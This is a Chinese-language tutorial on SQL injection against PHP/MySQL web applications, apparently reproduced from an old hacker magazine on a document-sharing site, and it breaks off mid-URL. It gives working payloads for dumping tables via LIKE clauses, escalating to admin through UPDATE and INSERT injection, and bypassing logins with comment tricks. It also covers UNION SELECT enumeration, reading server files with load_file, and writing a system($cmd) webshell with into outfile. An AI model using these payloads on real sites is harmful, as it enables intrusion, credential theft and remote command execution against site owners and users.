Php+Mysql注入专题.docx
- 文档编号:1974645
- 上传时间:2023-05-02
- 格式:DOCX
- 页数:42
- 大小:36.16KB
Php+Mysql注入专题.docx
《Php+Mysql注入专题.docx》由会员分享,可在线阅读,更多相关《Php+Mysql注入专题.docx(42页珍藏版)》请在冰点文库上搜索。
Php+Mysql注入专题
Php+Mysql注入专题
Php注入攻击是现今最流行的攻击方式,依靠它强大的灵活性吸引了广大黑迷。
在上一期的《php安全与注射专题》中林.linx主要讲述了php程序的各种漏洞,也讲到了php+mysql注入的问题,可是讲的注入的问题比较少,让我们感觉没有尽兴是吧.
OK,这一期我将给大家伙仔仔细细的吹一吹php+mysql注入,一定让你满载而归哦(谁扔砖头哩!
)。
本文主要是为小菜们服务的,如果你已经是一只老鸟呢,可能某些东西会感觉比较乏味,但只要你仔细的看,你会发现很多有趣的东西哦。
阅读此文你只要明白下面的这点东西就够了。
1.明白php+mysql环境是如何搭建的,在光盘中我们收录搭建的相关文章,如果您对搭建php+mysql环境不是很清楚,请先查阅此文,在上一期的专题中也有所介绍。
2.大概了解php和apache的配置,主要用到php.ini和httpd.conf
而此文我们主要用到的是php.ini的配置。
为了安全起见我们一般都打开php.ini里的安全模式,即让safe_mode=On,还有一个就是返回php执行错误的display_errors这会返回很多有用的信息,所以我们应该关闭之,
即让display_errors=off关闭错误显示后,php函数执行错误的信息将不会再显示给用户。
在php的配置文件php.ini中还有一个非常重要的配置选项magic_quotes_gpc,高版本的默认都是magic_quotes_gpc=On,只有在原来的古董级的php中的
默认配置是magic_quotes_gpc=Off,可是古董的东西也有人用的哦!
当php.ini中magic_quotes_gpc=On的时候会有什么情况发生哩,不用惊慌,天是塌不下来的啦!
它只是把提交的变量中所有的'(单引号),“(双引号),\(反斜线)和空字符会自动转为含有反斜线的转义字符,例如把’变成了\’,把\变成了\\。
就是这一点,让我们很不爽哦,很多时候我们对字符型的就只好说BYEBYE了,
但是不用气馁,我们还是会有好方法来对付它的,往下看咯!
3.有一定的php语言基础和了解一些sql语句,这些都很简单,我们用到的东西很少,所以充电还来的及哦!
我们先来看看magic_quotes_gpc=Off的时候我们能干些啥,然后我们再想办法搞一搞magic_quotes_gpc=On的情况哈
一:
magic_quotes_gpc=Off时的注入攻击
magic_quotes_gpc=Off的情况虽然说很不安全,新版本默认也让
magic_quotes_gpc=On了,可是在很多服务器中我们还发现magic_quotes_gpc=Off的情况,例如[url]www.qichi.[/url]*。
还有某些程序像vbb论坛就算你配置magic_quotes_gpc=On,它也会自动消除转义字符让我们有机可乘,所以说
magic_quotes_gpc=Off的注入方式还是大有市场的。
下面我们将从语法,注入点and注入类型几个方面来详细讲解mysql+php注入
A:
从MYSQL语法方面先
1。
先讲一些mysql的基本语法,算是给没有好好学习的孩子补课了哦~_~
1)select
SELECT[STRAIGHT_JOIN][SQL_SMALL_RESULT]
select_expression,...
[INTO{OUTFILE|DUMPFILE}'file_name'export_options]
[FROMtable_references
[WHEREwhere_definition]
[GROUPBYcol_name,...]
[ORDERBY{unsigned_integer|col_name|formula}[ASC|DESC],...]
]
常用的就是这些,select_expression指想要检索的列,后面我们可以用where来限制条件,我们也可以用intooutfile将select结果输出到文件中。
当然我们也可以用select直接输出
例如
mysql>select'a';
+---+
|a|
+---+
|a|
+---+
1rowinset(0.00sec)
具体内容请看mysql中文手册7.12节
下面说一些利用啦
看代码先
这段代码是用来搜索的哦
echo$PHP_SELF;? >“> php ……… SELECT*FROMusersWHEREusernameLIKE‘%$search%’ORDERBYusername ……. ? > 这里我们顺便说一下mysql中的通配符,’%’就是通配符,其它的通配符还有’*’和’_’,其中"*"用来匹配字段名,而"%"用来匹配字段值,注意的是%必须与like一起适用,还有一个通配符,就是下划线"_",它代表的意思和上面不同,是用来匹配任何单个的字符的。 在上面的代码中我们用到了’*’表示返回的所有字段名,%$search%表示所有包含$search字符的内容。 我们如何注入哩? 哈哈,和asp里很相似 在表单里提交 Aabb%’or1=1orderbyid# 注: #在mysql中表示注释的意思,即让后面的sql语句不执行,后面将讲到。 或许有人会问为什么要用or1=1呢,看下面, 把提交的内容带入到sql语句中成为 SELECT*FROMusersWHEREusernameLIKE‘%aabb%’or1=1orderbyid#ORDERBYusername 假如没有含有aabb的用户名,那么or1=1使返回值仍为真,使能返回所有值 我们还可以这样 在表单里提交 %’orderbyid# 或者 ’orderbyid# 带入sql语句中成了 SELECT*FROMusersWHEREusernameLIKE‘%%’orderbyid#ORDERBYusername 和 SELECT*FROMusersWHEREusernameLIKE‘%%’orderbyid#ORDERBYusername 当然了,内容全部返回。 列出所有用户了哟,没准连密码都出来哩。 这里就举个例子先,下面会有更精妙的select语句出现,select实际上几乎是无处不在的哦! 2)下面看update咯 Mysql中文手册里这么解释的: UPDATE[LOW_PRIORITY]tbl_nameSETcol_name1=expr1,col_name2=expr2,... [WHEREwhere_definition] UPDATE用新值更新现存表中行的列,SET子句指出哪个列要修改和他们应该被给定的值,WHERE子句,如果给出,指定哪个行应该被更新,否则所有行被更新。 详细内容去看mysql中文手册7.17节啦,在这里详细介绍的话会很罗嗦的哦。 由上可知update主要用于数据的更新,例如文章的修改,用户资料的修改,我们似乎更关心后者,因为...... 看代码先哦 我们先给出表的结构,这样大家看的明白 CREATETABLEusers( idint(10)NOTNULLauto_increment, loginvarchar(25), passwordvarchar(25), emailvarchar(30), userleveltinyint, PRIMARYKEY(id) ) 其中userlevel表示等级,1为管理员,2为普通用户 php //change.php …… $sql="UPDATEusersSETpassword='$pass',email='$email'WHEREid='$id'" …… ? > Ok,我们开始注入了哦,在添email的地方我们添入 netsh@’,userlevel=’1 sql语句执行的就是 UPDATEusersSETpassword='youpass', email='netsh@’,userlevel=’1’WHEREid='youid’ 看看我们的userlevel就是1了,变成管理员了哟 哈哈,如此之爽,简直是居家旅行必备啊。 这里我们简单提一下单引号闭合的问题,如果只用了一个单引号而没有单引号与之组成一对,系统会返回错误。 列类型主要分为数字类型,日期和时间类型,字符串类型,然而引号一般用在字符串类型里,而在数字类型里一般人都不会用到引号(然而却是可以用的,而且威力很大),日期和时间类型就很少用于注入了(因为很少有提交时间变量的)。 在下面我们会详细将这几种类型的注入方式哦! 3)下面轮到insert了,它已经等的不耐烦了,简直就像中午食堂里的学生们。 Php中文手册是这样教我们的: INSERT[LOW_PRIORITY|DELAYED][IGNORE] [INTO]tbl_name[(col_name,...)] VALUES(expression,...),(...),... INSERT把新行插入到一个存在的表中,INSERT...VALUES形式的语句基于明确指定的值插入行,INSERT...SELECT形式插入从其他表选择的行,有多个值表的INSERT...VALUES的形式在MySQL3.22.5或以后版本中支持,col_name=expression语法在MySQL3.22.10或以后版本中支持。 由此可见对于见不到后台的我们来说,insert主要就出现在注册的地方,或者有其它提交的地方地方也可以哦。 看看表的结构先 CREATETABLEmembres( idvarchar(15)NOTNULLdefault'', loginvarchar(25), passwordvarchar(25), emailvarchar(30), userleveltinyint, PRIMARYKEY(id) ) 我们仍然假设userlevel表示用户等级,1为管理者,2为普通用户哈。 代码如下 php //reg.php …… $query="INSERTINTOmembersVALUES('$id','$login','$pass','$email',’2')"; …… ? > 默认插入用户等级是2 现在我们构建注入语句了哦 还是在要我们输入email的地方输入: netsh@’,’1’)# sql语句执行时变成了: INSERTINTOmembresVALUES('youid','youname','youpass','netsh@’,’1’)#',? ') 看我们一注册就是管理员了。 #号表示什么来着,不是忘了吧,晕了,这么快? 忘就忘了吧,下面再详细给你说说 2.下面说一说mysql中的注释,这个是很重要的,大家可不能再睡觉啦,要是再睡觉到期末考试的时候就挂了你们。 我们继续 相信大家在上面的几个例子中已经看到注释的强大作用了吧,这里我们将再详细介绍一下。 Mysql有3种注释句法 #注射掉注释符后面的本行内容 --注射效果同# /*...*/注释掉符号中间的部分 对于#号将是我们最常用的注释方法。 --号记得后面还得有一个空格才能起注释作用。 /*…*/我们一般只用前面的/*就够了,因为后面的我们想加也不行,是吧? 注意: 在浏览器地址栏输入#时应把它写成%23,这样经urlencode转换后才能成为#,从而起到注释的作用。 #号在浏览器的地址框中输入的话可什么也不是哦。 为了大家深刻理解 这里我给大家来个例题 有如下的管理员信息表 CREATETABLEalphaauthor( Idtinyint(4)NOTNULLauto_increment, UserNamevarchar(50)NOTNULLdefault'', PASSWORDvarchar(50)defaultNULL, Namevarchar(50)defaultNULL, PRIMARYKEY(Id), UNIQUEKEYId(Id), KEYId_2(Id) ) php //Login.php …… $query="select*fromalphaauthorwhereUserName='$username'andPassword='$passwd'"; $result=mysql_query($query); $data=mysql_fetch_array($result); if($data) { Echo“重要信息”; } Else Echo“登陆失败”; …… ? > 我们在浏览器地址框直接输入 http: //***/login.php? username=a’orid=1%23 %23转换成#了 放到sql语句中 select*fromalphaauthorwhereUserName='a’orid=1#'andPassword='$passwd' #号后面的都拜输入了,看看 这句话等价于 select*fromalphaauthorwhereUserName='a’orid=1 再仔细看看表的结构,只要有id=1的账户,返回的$data就应该为真 我们就直接登陆了,当然你也可以写 hppt: //***/login.php? username=a’or1=1%23 一样的啦 3.下面将要出场的是…… 对了,就是这些显示系统信息的间谍们 VERSION()返回数据库版本信息 DATABASE()返回当前的数据库名字,如果没有当前的数据库,DATABASE()返回空字符串。 USER() SYSTEM_USER() SESSION_USER() 返回当前MySQL用户名 mysql>selectuser(),database(),version(); +----------------+------------+----------------+ |user()|database()|version()| +----------------+------------+----------------+ |root@localhost|alpha|5.0.0-alpha-nt| +----------------+------------+----------------+ 1rowinset(0.01sec) 如图 (1)所示,图不是很爽是不是? 睁大你的大眼睛好好看哦 有时候很有用的哦,比如说你可以根据他的mysql版本看看他的mysql有没有什么溢出漏洞,没准我们就发现个好动东哈哈 4.下面进入最重要的部分了,没睡觉的打起精神来,睡着了的醒一醒啦。 1)selectunionselect 还是php中文手册中讲的: SELECT...UNION[ALL]SELECT...[UNIONSELECT...] UNION在MySQL4.0.0中被实现。 UNION用于将多个SELECT语句的结果联合到一个结果集中。 在SELECT中的select_expression部分列出的列必须具有同样的类型。 第一个SELECT查询中使用的列名将作为结果集的列名返回。 SELECT命令是一个普通的选择命令,但是有下列的限制: 只有最后一个SELECT命令可以有INTOOUTFILE。 需要注意的是union前后的select字段数相同,只有这样union函数才能发挥作用。 如果字段数不等将返回 ERROR1222(21000): TheusedSELECTstatementshaveadifferentnumberofcolumns错误 晕咯,这样不好吧。 咋半哩? 别急哈,急也没用的 例如: 已知alphadb表有11列 我们 mysql>select*fromalphadbwhereid=351unionselect1,2,3,4,5,6,7,8,9,10fromalphaauthor; 如图 (2) 我们只slect了10个数当然出错啦。 下面看 mysql>select*fromalphadbwhereid=347unionselect1,2,3,4,5,6,7,8,9,10,11fromalphaauthor; 如图(3) 我们看看id=247中的数据先 mysql>select*fromalphadbwhereid=347; +-----+--------------------------------------------+----------------- |id|title|content|importtime|author|accessing|addInto|type|showup|change_ubb|change_html| +-----+--------------------------------------------+----------------- |347|利用adsutil.vbs+..--发表于黑客档案2004.6期|发表于黑客x档案第6期|2004 -03-2811: 50: 50|Alpha|17|Alpha|2|1|1|1| +-----+--------------------------------------------+----------------- 1rowinset(0.00sec) 我们看到,它的返回结果和 mysql>select*fromalphadbwhereid=347unionselect1,2,3,4,5,6,7,8,9,10,11fromalphaauthor; 是相同的。 哦,大家或许会问,这样有什么用呢? 问的好。 Ok,继续试验 当我们输入一个不存在的id的时候 例如id=0,或者id=347and1<>1 再看看 mysql>select*fromalphadbwhereid=347and1<>1unionselect1,2,3,4,5,6,7,8,9,10,11fromalphaauthor; 如图(4) 我们发现它把我们后面的1,2,3,4,5,6,7,8,9,10,11赋给了各个字段来显示。 哈哈,终于显示不一样了,可是这有什么用呢? 先不告诉你。 我们讲一个具体的例子先 [url]http: //localhost/site/display.php? id=347[/url] 看看图5 [url]http: //localhost/site/display.php? id=347[/url]and1<>1unionselect1,2,3,4,5,6,7,8,9,10,11fromalphaauthor 结果如图6 下面我们用一幅图来总结一下union的用法如图7 Ok,知道怎么利用了不? 不知道的话下面将会详细告诉你。 2)LOAD_FILE 这个功能太强大了,这也是林.linx在上一个专题中提到的方法。 虽然说过了,可我也不得不再提出来。 Load_file可以返回文件的内容,记得写全文件的路径和文件名称 Etc. 我们在mysql的命令行下输入 mysql>selectload_file('c: /boot.ini'); 效果如图(8) 可是我们在网页中怎么搞呢? 我们可以结合unionselect使用 [url]http: //localhost/site/display.php? id=347%20and%201<>1%20union%20select%201[/url],2,load_file('c: /apache/htdocs/site/lib/sql.inc'),4,5,6,7,8,9,10,11 这里的c: /apache/htdocs/site/lib/sql.inc并不是我的配置文件哦,: P 看仔细图9中的 看看,文件内容暴露无疑。 我们为什么要把load_file('c: /apache/htdocs/site/lib/sql.inc')放在3字段呢? 我们前面提到列类型一共有那么三种,而原来图7中显示3的地方应该是显示文章内容,应该是字符型的,而load_file('c: /apache/htdocs/site/lib/sql.inc')也一定是字符型的,所以我们猜测放在3字段可以顺利显示。 其实还有很多好的利用方法,继续往下看哦! 3)select*fromtableintooutfile'file.txt' 有啥用哩? 作用就是把表的内容写入文件,知道有多重要了吧,我们写个webshell吧,哈哈。 当然我们不只是导出表,我们还可以导出其它东西的哦,往下看啦。 假设有如下表 # #数据表的结构`test` # CREATETABLEtest( atext, btext )ENGINE=MyISAMDEFAULTCHARSET=latin1; # #导出下面的数据库内容`test` # INSERTINTOtestVALUES(' phpsystem($cmd);? >',NULL); 已知我的网站路径在C: /apache/htdocs/site/ 好,看你表演哦,输入 [url]http: //localhost/site/display.php? id=451%20and%201=2%20%20union%20select%201[/url],2,a,4,5,6,7,8,9,10,11%20from%20tes
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- Php Mysql 注入 专题